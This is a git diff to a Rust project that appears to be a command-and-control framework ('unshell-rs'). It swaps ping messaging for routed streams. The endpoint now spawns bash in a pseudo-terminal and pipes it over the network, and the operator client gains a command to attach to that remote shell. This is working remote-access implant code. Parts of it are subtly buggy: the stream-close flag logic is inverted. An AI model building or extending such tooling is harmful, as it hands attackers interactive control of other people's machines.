diff --git a/src/client/node_cli.rs b/src/client/node_cli.rs index be7feed..32dca67 100644 --- a/src/client/node_cli.rs +++ b/src/client/node_cli.rs @@ -1,8 +1,14 @@ -use std::time::Instant; +use std::{ + io::{Read, Write, stdin, stdout}, + thread, +}; use clap::{Parser, Subcommand}; -use portable_pty::{PtySize, native_pty_system}; -use unshell_rs_lib::{C2Packet, Error, nodes::NodeContainer}; +use unshell_rs_lib::{ + Error, + networkers::Connection, + nodes::{NodeContainer, Stream}, +}; use crate::client::cli::{Cli, CommandHolder}; @@ -17,8 +23,10 @@ pub enum NodeCliCommands { Nodes, /// Send a ping to a remote node Ping { n: usize }, + // /// Attempt to create a shell at a remote node + // Sh { n: usize }, /// Attempt to create a shell at a remote node - Sh { n: usize }, + Stream { n: usize }, } impl Cli for NodeCli { @@ -40,46 +48,50 @@ impl Cli for NodeCli { info!("[{}] {}", i + 1, node); } } - NodeCliCommands::Ping { n } => { + NodeCliCommands::Ping { .. } => { // if split.count().clone() <= 1 { // warn!("You must specify an option"); // continue; // } - if n <= 0 { - warn!("Node id must be greater than zero"); - } else if n > node_ids.len() { - warn!("Node id {} is out of maximum range {}", n, node_ids.len()); - } else { - let start = Instant::now(); - let node = node_ids.get(n - 1).unwrap().clone(); - self.node.send_unrouted(&node, &C2Packet::Ping).unwrap(); - info!("Sent ping..."); + // if n <= 0 { + // warn!("Node id must be greater than zero"); + // } else if n > node_ids.len() { + // warn!("Node id {} is out of maximum range {}", n, node_ids.len()); + // } else { + // let start = Instant::now(); + // let node = node_ids.get(n - 1).unwrap().clone(); + // self.node.send_unrouted(&node, &C2Packet::Ping).unwrap(); + // info!("Sent ping..."); - let (_, packet) = self.node.read_packet()?; - match packet { - C2Packet::Pong => { - // if src != nod - info!( - "Pong! Latency: {}ms", - (start.elapsed().as_micros() as f32) / 1000. - ); - } - _ => { - error!("Got incorrect packet: {:?}", packet); - } - } + // let (_, packet) = self.node.read()?; + // match packet { + // C2Packet::Pong => { + // // if src != nod + // info!( + // "Pong! Latency: {}ms", + // (start.elapsed().as_micros() as f32) / 1000. + // ); + // } + // _ => { + // error!("Got incorrect packet: {:?}", packet); + // } + // } - // node_state = self.node.state.lock().unwrap(); - } + // // node_state = self.node.state.lock().unwrap(); + // } } - NodeCliCommands::Sh { n } => { + NodeCliCommands::Stream { n } => { if n <= 0 { warn!("Node id must be greater than zero"); } else if n > node_ids.len() { warn!("Node id {} is out of maximum range {}", n, node_ids.len()); } else { let node_id = node_ids.get(n - 1).unwrap().clone(); + + let stream = self.node.create_stream_block(node_id)?; + + self.run_pty(stream)?; } } } @@ -96,17 +108,47 @@ impl NodeCli { } } - pub fn run_pty(&mut self) -> Result<(), Error> { - let pty_system = native_pty_system(); - let pty_pair = pty_system.openpty(PtySize { - rows: 24, - cols: 80, - pixel_width: 0, - pixel_height: 0, - })?; + pub fn run_pty(&mut self, mut stream: Stream) -> Result<(), Error> { + let mut stream_clone = stream.try_clone()?; + + // Thread to read from stdin and write to TCP stream + let stdin_to_tcp = thread::spawn(move || { + let mut stdin = stdin(); + let mut buffer = [0u8; 1024]; + loop { + match stdin.read(&mut buffer) { + Ok(0) => break, // EOF + Ok(n) => { + if stream.write(&buffer[..n]).is_err() { + break; + } + } + Err(e) => { + error!("Error reading from stdin: {}", e); + break; + } + } + } + }); + + // Thread to read from TCP stream and write to stdout + let tcp_to_stdout = thread::spawn(move || { + loop { + let data = stream_clone.read().unwrap(); + if stdout().write_all(&data).is_err() { + break; + } + stdout().flush().ok(); + } + }); + + // Wait for either thread to finish + let _ = stdin_to_tcp.join(); + let _ = tcp_to_stdout.join(); + + error!("Disconnected from server"); Ok(()) - // pty_pair.Ok(()) } } diff --git a/src/endpoint/endpoint.rs b/src/endpoint/endpoint.rs index 8ef1e50..18f27ce 100644 --- a/src/endpoint/endpoint.rs +++ b/src/endpoint/endpoint.rs @@ -1,7 +1,9 @@ -use std::net::SocketAddr; +use std::{net::SocketAddr, thread}; +use portable_pty::{CommandBuilder, PtySize, native_pty_system}; use unshell_rs_lib::{ - C2Packet, Error, + Error, + networkers::Connection, nodes::{ConnectionConfig, NodeContainer}, }; @@ -15,18 +17,89 @@ pub fn run_endpoint(socket: SocketAddr) -> Result<(), Error> { }], )?; - loop { - let (src, packet) = node.read_packet()?; - match packet { - C2Packet::Ping => { - info!("Ping from {}!", src); - node.send_unrouted(&src, &C2Packet::Pong)?; - // (&mut node.state.lock().unwrap()).send_unrouted(src, &C2Packet::Pong)?; + let mut stream = node.recv_stream()?; + + let pty_system = native_pty_system(); + let pty_pair = pty_system.openpty(PtySize { + rows: 24, + cols: 80, + pixel_width: 0, + pixel_height: 0, + })?; + + let mut cmd = CommandBuilder::new("bash"); + cmd.env("TERM", "xterm-256color"); + // pty_pair. + + let child = pty_pair.slave.spawn_command(cmd)?; + + // Get the master PTY for reading/writing + let master = pty_pair.master; + + let mut master_reader = master.try_clone_reader()?; + let mut master_writer = master.take_writer()?; + + // Clone stream for bidirectional communication + let mut stream_clone = stream.try_clone()?; + + // Thread to read from PTY and write to TCP stream + let pty_to_tcp = thread::spawn(move || { + let mut buffer = [0u8; 1024]; + loop { + match master_reader.read(&mut buffer) { + Ok(0) => break, // EOF + Ok(n) => { + if stream.write(&buffer[..n]).is_err() { + break; + } + // stream.flush().ok(); + } + Err(e) => { + error!("Error reading from PTY: {}", e); + break; + } } - C2Packet::Pong => { - info!("Pong!"); - } - _ => {} } - } + println!("stopped!"); + }); + + // Thread to read from TCP stream and write to PTY + let tcp_to_pty = thread::spawn(move || { + // let mut buffer = [0u8; 1024]; + loop { + let data = stream_clone.read().unwrap(); + if master_writer.write(&data).is_err() { + break; + } + } + println!("stopped!"); + }); + + // Wait for either thread to finish + let _ = pty_to_tcp.join(); + let _ = tcp_to_pty.join(); + + // Clean up the child process + // let _ = child.kill(); + // let _ = child.wait(); + + Ok(()) + + // loop { + // let data = stream.read()?; + // println!("DATA: {:?}", data); + + // let (src, packet) = node()?; + // match packet { + // C2Packet::Ping => { + // info!("Ping from {}!", src); + // // node.send_unrouted(&src, &C2Packet::Pong)?; + // // (&mut node.state.lock().unwrap()).send_unrouted(src, &C2Packet::Pong)?; + // } + // C2Packet::Pong => { + // info!("Pong!"); + // } + // _ => {} + // } + // } } diff --git a/unshell-rs-lib/src/nodes/node.rs b/unshell-rs-lib/src/nodes/node.rs index f795c3c..0570101 100644 --- a/unshell-rs-lib/src/nodes/node.rs +++ b/unshell-rs-lib/src/nodes/node.rs @@ -1,15 +1,13 @@ use std::{ collections::HashMap, fmt::Debug, - sync::{ - Arc, Mutex, - mpsc::{self, Receiver, Sender}, - }, + sync::{Arc, Mutex, MutexGuard}, thread, time::Duration, }; use bincode::{Decode, Encode}; +use crossbeam_channel::{Receiver, RecvError, Sender}; // use std:::{Receiver, Sender}; #[allow(deprecated)] use rand::{seq::IndexedRandom, thread_rng}; @@ -37,7 +35,8 @@ where P: Encode + Decode<()> + Debug + Clone + 'static, { pub state: Arc>>, - pub rx: Receiver<(String, P)>, + rx: Receiver<(String, P)>, + disconnect_rx: Receiver, } impl

Node

@@ -54,13 +53,15 @@ where { // let mut parent = build_client(TCPClient::connect(&parent.socket)?, parent.layers)?; - let (tx, rx) = mpsc::channel(); + let (tx, rx) = crossbeam_channel::unbounded(); + let (disconnect_tx, disconnect_rx) = crossbeam_channel::unbounded(); let state = Arc::new(Mutex::new(NodeState::

{ id: id, //Uuid::new_v4().to_string(), //TODO: Calling an OS RNG can pose a problem for security; connections: HashMap::new(), map: HashMap::new(), packet_listener: tx, + disconnect_listener: disconnect_tx, })); for listener in listeners { @@ -85,7 +86,11 @@ where }); } - Ok(Self { state, rx }) + Ok(Self { + state, + rx, + disconnect_rx, + }) } fn run_client(client: ConnectionConfig, state: &Arc>>) -> Result<(), Error> { @@ -191,6 +196,30 @@ where Ok(()) } + + pub fn recv(&self) -> Result<(String, P), RecvError> { + self.rx.recv() + } + + pub fn state(&self) -> MutexGuard<'_, NodeState

> { + self.state.lock().unwrap() + } + + pub fn try_clone(&self) -> Result { + Ok(Self { + state: Arc::clone(&self.state), + rx: self.rx.clone(), + disconnect_rx: self.disconnect_rx.clone(), + }) + } + + pub fn send_unrouted(&self, dest: String, data: &P) -> Result<(), Error> { + self.state().send_unrouted(dest, data) + } + + pub fn get_disconnect_rx(&self) -> Receiver { + self.disconnect_rx.clone() + } } pub struct NodeState

@@ -201,6 +230,7 @@ where connections: HashMap>, map: HashMap>, packet_listener: Sender<(String, P)>, + disconnect_listener: Sender, } impl

NodeState

@@ -309,6 +339,8 @@ where if direct { "direct" } else { "indirect" } ); + self.disconnect_listener.send(remove_uuid.clone()).unwrap(); + for (uuid, route) in self.map.iter_mut() { if route.contains(&remove_uuid) { let index = route.iter().position(|r| r == &remove_uuid).unwrap(); @@ -396,12 +428,16 @@ where fn route_packet(&mut self, src: String, dest: String, data: Vec) -> Result<(), Error> { if dest == self.id { self.packet_listener.send((src, decode_vec::

(&data)?))?; + + Ok(()) } else { if self.connections.contains_key(&dest) { write( self.connections.get_mut(&dest).unwrap(), Packets::DataUnrouted { src, dest, data }, )?; + + Ok(()) } else if self.map.contains_key(&dest) { #[allow(deprecated)] let next_uuid = self @@ -416,12 +452,12 @@ where self.connections.get_mut(&next_uuid).unwrap(), Packets::DataUnrouted { src, dest, data }, )?; + + Ok(()) } else { - error!("Could not find route from {} to {}!", src, dest); + Err::<(), Error>(format!("Could not find route from {} to {}!", src, dest).into()) } } - - Ok(()) } pub fn send_unrouted(&mut self, dest: String, data: &P) -> Result<(), Error> { diff --git a/unshell-rs-lib/src/nodes/node_container.rs b/unshell-rs-lib/src/nodes/node_container.rs index bd02003..ccb415e 100644 --- a/unshell-rs-lib/src/nodes/node_container.rs +++ b/unshell-rs-lib/src/nodes/node_container.rs @@ -7,21 +7,19 @@ use std::{ use crossbeam_channel::{Receiver, Sender}; use crate::{ - C2Packet, Error, - nodes::{ - ConnectionConfig, Node, Stream, - node::NodeState, - packets::{decode_vec, encode_vec}, - }, + Error, + nodes::{ConnectionConfig, Node, Stream, stream::StreamHandle}, packets::TransportLayerPacket, }; -type Streams = Arc>)>>>>; +type Streams = Arc>>; pub struct NodeContainer { streams: Streams, - state: Arc>>, - spontanious_rx: Receiver<(String, C2Packet)>, + node: Node, + on_stream_rx: Receiver, + // state: Arc>>, + // spontanious_rx: Receiver<(String, C2Packet)>, } impl NodeContainer { @@ -30,20 +28,38 @@ impl NodeContainer { clients: Vec, listeners: Vec, ) -> Result { - let node = Node::run_node(id, clients, listeners)?; + let node = Node::::run_node(id, clients, listeners)?; let streams = Arc::new(Mutex::new(HashMap::new())); - let (spontanious_tx, spontanious_rx) = crossbeam_channel::unbounded(); + // let (spontanious_tx, spontanious_rx) = crossbeam_channel::unbounded(); + let (on_stream_tx, on_stream_rx) = crossbeam_channel::unbounded(); let s = Self { streams: Arc::clone(&streams), - state: Arc::clone(&node.state), - spontanious_rx, + node: node.try_clone()?, + on_stream_rx, }; + let close_rx = node.get_disconnect_rx(); + let stream_clone = Arc::clone(&streams); + thread::spawn(move || { + loop { + let close_uuid = close_rx.recv().unwrap(); + let stream = stream_clone.lock().unwrap(); + let keys = stream.keys(); + for key in keys { + if key.1 == close_uuid { + warn!("Stream ({}, {}) disconnected!", key.0, key.1); + let handle = (&mut stream_clone.lock().unwrap()).remove(key).unwrap(); + handle.close(); + } + } + } + }); + // Start node listening thread thread::spawn(move || { loop { - if let Err(e) = Self::node_listening_thread(&node, &streams, &spontanious_tx) { + if let Err(e) = Self::node_listening_thread(&node, &streams, &on_stream_tx) { error!("Got error: {}", e); } } @@ -55,97 +71,113 @@ impl NodeContainer { fn node_listening_thread( node: &Node, streams: &Streams, - spontanious_tx: &Sender<(String, C2Packet)>, + on_stream_tx: &Sender, // spontanious_tx: &Sender<(String, C2Packet)>, ) -> Result<(), Error> { - let (src, packet) = node.rx.recv()?; + // info!("Loop"); + let (src, packet) = node.recv()?; + info!("Packet: {:?}", packet); match packet { - TransportLayerPacket::RequestStreamUnrouted { stream_id } => { + TransportLayerPacket::RequestStreamUnrouted { + stream_id: remote_stream_id, + } => { + // Create stream ID let local_stream_id = streams.lock().unwrap().keys().len(); - streams - .lock() - .unwrap() - .insert((local_stream_id, src.clone()), None); - (&mut node.state.lock().unwrap()).send_unrouted( - src, - &TransportLayerPacket::AckStreamUnrouted { - local_stream_id, - remote_stream_id: stream_id, - }, - )?; + // Send response to server including local id and remoe ID + Stream::respond_create(src.clone(), local_stream_id, remote_stream_id, node)?; + Self::create_handle_thread( + on_stream_tx, + streams, + node, + src, + local_stream_id, + remote_stream_id, + )?; Ok(()) } TransportLayerPacket::AckStreamUnrouted { - local_stream_id, - remote_stream_id, + ack_stream_id, + stream_id, } => { - let key = &(remote_stream_id, src); - if let Some(stream_mut) = streams.lock().unwrap().get_mut(&key) { - if stream_mut.is_none() { - let stream = Self::create_stream(local_stream_id, node, src, stream_mut)?; - Ok(()) - } else { - Err(format!("Stream {:?} already exists!", key).into()) - } - } else { - Err(format!("Could not find stream id by {:?}", key).into()) - } - } - TransportLayerPacket::StreamDataUnrouted { stream_id, data } => todo!(), - TransportLayerPacket::SpontaniousDataUnrouted { data } => { - spontanious_tx.send((src, decode_vec::(&data)?))?; + Self::create_handle_thread( + on_stream_tx, + streams, + node, + src, + ack_stream_id, + stream_id, + )?; Ok(()) } + TransportLayerPacket::StreamDataUnrouted { stream_id, data } => { + match streams.lock().unwrap().get(&(stream_id, src.clone())) { + Some(handle) => Ok(handle.send(data).unwrap()), + // Some(_) => Err(format!( + // "Stream {}, {} has not been initilized!", + // stream_id, src + // ) + // .into()), + None => Err(format!("Stream {}, {} does not exist!", stream_id, src).into()), + } + } // _ => Err(format!("Unsupported packet: {:?}", packet).into()), } } - fn create_stream( - remote_stream_id: usize, - dest: String, + fn create_handle_thread( + on_stream_tx: &Sender, + streams: &Streams, node: &Node, - stream_mut: &mut Option<(Stream, Sender>)>, + src: String, + local_stream_id: usize, + remote_stream_id: usize, ) -> Result<(), Error> { - let (recv_tx, recv_rx) = crossbeam_channel::unbounded(); - let (send_tx, send_rx) = crossbeam_channel::unbounded(); + info!("Local: {}, Remote: {}", local_stream_id, remote_stream_id); - let stream = Stream::new(send_tx, recv_rx); + // Create stream from local and remote stream handles + let (stream, handle) = + Stream::create_handle(src.clone(), local_stream_id, remote_stream_id)?; - let _ = stream_mut.insert((stream, recv_tx)); + on_stream_tx.send(stream)?; + // Add the local stream to map + streams + .lock() + .unwrap() + .insert((local_stream_id, src.clone()), handle.clone()?); + + let node_clone = node.try_clone()?; thread::spawn(move || { loop { - let packet = send_rx.recv().unwrap(); - (&mut node.state.lock().unwrap()) - .send_unrouted( - dest, - &TransportLayerPacket::StreamDataUnrouted { - stream_id: remote_stream_id, - data: packet, - }, - ) - .unwrap(); + let data = handle.recv().unwrap(); + if let Err(e) = node_clone.state().send_unrouted( + src.clone(), + &TransportLayerPacket::StreamDataUnrouted { + stream_id: remote_stream_id, + data, + }, + ) { + error!("Got error: {}", e); + break; + } } }); Ok(()) } + pub fn create_stream_block(&self, dest: String) -> Result { + let local_stream_id = self.streams.lock().unwrap().keys().len(); + Stream::ask_create(dest.clone(), local_stream_id, &self.node)?; + Ok(self.on_stream_rx.recv()?) + } + + pub fn recv_stream(&self) -> Result { + Ok(self.on_stream_rx.recv()?) + } + pub fn get_nodes(&self) -> Vec { - self.state.lock().unwrap().get_all_nodes() - } - - pub fn send_unrouted(&self, dest: &String, data: &C2Packet) -> Result<(), Error> { - (&mut self.state.lock().unwrap()).send_unrouted( - dest.clone(), - &TransportLayerPacket::SpontaniousDataUnrouted { - data: encode_vec(data)?, - }, - )?; - Ok(()) - } - - pub fn read_packet(&self) -> Result<(String, C2Packet), Error> { - Ok(self.spontanious_rx.recv()?) + self.node.state().get_all_nodes() + // self.state.lock().unwrap().get_all_nodes() } } diff --git a/unshell-rs-lib/src/nodes/stream.rs b/unshell-rs-lib/src/nodes/stream.rs index 8664b1b..84462aa 100644 --- a/unshell-rs-lib/src/nodes/stream.rs +++ b/unshell-rs-lib/src/nodes/stream.rs @@ -1,10 +1,16 @@ +use std::sync::{ + Arc, + atomic::{AtomicBool, Ordering}, +}; + use crossbeam_channel::{Receiver, Sender}; -use crate::networkers::Connection; +use crate::{Error, networkers::Connection, nodes::Node, packets::TransportLayerPacket}; pub struct Stream { tx: Sender>, rx: Receiver>, + closed: Arc, } impl Connection for Stream { @@ -13,24 +19,137 @@ impl Connection for Stream { } fn is_alive(&self) -> bool { - true + self.closed.load(Ordering::Relaxed) } fn read(&mut self) -> Result, crate::Error> { - Ok(self.rx.recv()?) + if self.closed.load(Ordering::Relaxed) { + Err("Connection closed".into()) + } else { + Ok(self.rx.recv()?) + } } fn write(&mut self, data: &[u8]) -> Result<(), crate::Error> { - Ok(self.tx.send(data.to_vec())?) + if self.closed.load(Ordering::Relaxed) { + Err("Connection closed".into()) + } else { + Ok(self.tx.send(data.to_vec())?) + } } fn try_clone(&self) -> Result, crate::Error> { - todo!() + Ok(Box::new(Self { + tx: self.tx.clone(), + rx: self.rx.clone(), + closed: Arc::clone(&self.closed), + })) } } impl Stream { - pub fn new(tx: Sender>, rx: Receiver>) -> Self { - Self { tx, rx } + pub fn ask_create( + dest: String, + local_stream_id: usize, + node: &Node, + ) -> Result<(), Error> { + info!("Sent to {}", dest); + node.send_unrouted( + dest.clone(), + &TransportLayerPacket::RequestStreamUnrouted { + stream_id: local_stream_id, + }, + )?; + + Ok(()) + + // Self::create_handle(dest, local_stream_id, remote_stream_id, node) + } + + pub fn respond_create( + dest: String, + local_stream_id: usize, + remote_stream_id: usize, + node: &Node, + ) -> Result<(), Error> { + node.send_unrouted( + dest.clone(), + &&TransportLayerPacket::AckStreamUnrouted { + ack_stream_id: remote_stream_id, + stream_id: local_stream_id, + }, + )?; + + Ok(()) + } + + pub fn create_handle( + dest: String, + local_stream_id: usize, + remote_stream_id: usize, + ) -> Result<(Self, StreamHandle), Error> { + let (recv_tx, recv_rx) = crossbeam_channel::unbounded(); + let (send_tx, send_rx) = crossbeam_channel::unbounded(); + + let closed = Arc::new(AtomicBool::new(false)); + + let handle = StreamHandle { + dest, + tx: recv_tx, + rx: send_rx, + local_stream_id, + remote_stream_id, + closed: Arc::clone(&closed), + }; + + Ok(( + Self { + tx: send_tx, + rx: recv_rx, + closed, + }, + handle, + )) + } + + // pub fn new(tx: Sender>, rx: Receiver>) -> Self { + // Self { tx, rx } + // } +} + +pub struct StreamHandle { + pub dest: String, + pub local_stream_id: usize, + pub remote_stream_id: usize, + + tx: Sender>, + rx: Receiver>, + closed: Arc, +} + +impl StreamHandle { + pub fn send(&self, data: Vec) -> Result<(), Error> { + Ok(self.tx.send(data)?) + } + pub fn has_content(&self) -> bool { + self.rx.len() > 0 + } + pub fn recv(&self) -> Result, Error> { + Ok(self.rx.recv()?) + } + pub fn clone(&self) -> Result { + Ok(Self { + dest: self.dest.clone(), + local_stream_id: self.local_stream_id.clone(), + remote_stream_id: self.remote_stream_id.clone(), + tx: self.tx.clone(), + rx: self.rx.clone(), + closed: Arc::clone(&self.closed), + }) + } + pub fn close(self) { + drop(self.tx); + drop(self.rx); + self.closed.store(false, Ordering::Relaxed); } } diff --git a/unshell-rs-lib/src/packets.rs b/unshell-rs-lib/src/packets.rs index 0098587..a27b5a0 100644 --- a/unshell-rs-lib/src/packets.rs +++ b/unshell-rs-lib/src/packets.rs @@ -7,17 +7,16 @@ pub enum TransportLayerPacket { stream_id: usize, }, AckStreamUnrouted { - local_stream_id: usize, - remote_stream_id: usize, + ack_stream_id: usize, + stream_id: usize, }, StreamDataUnrouted { stream_id: usize, data: Vec, }, - - SpontaniousDataUnrouted { - data: Vec, - }, + // SpontaniousDataUnrouted { + // data: Vec, + // }, } #[derive(Debug, Encode, Decode, Clone)]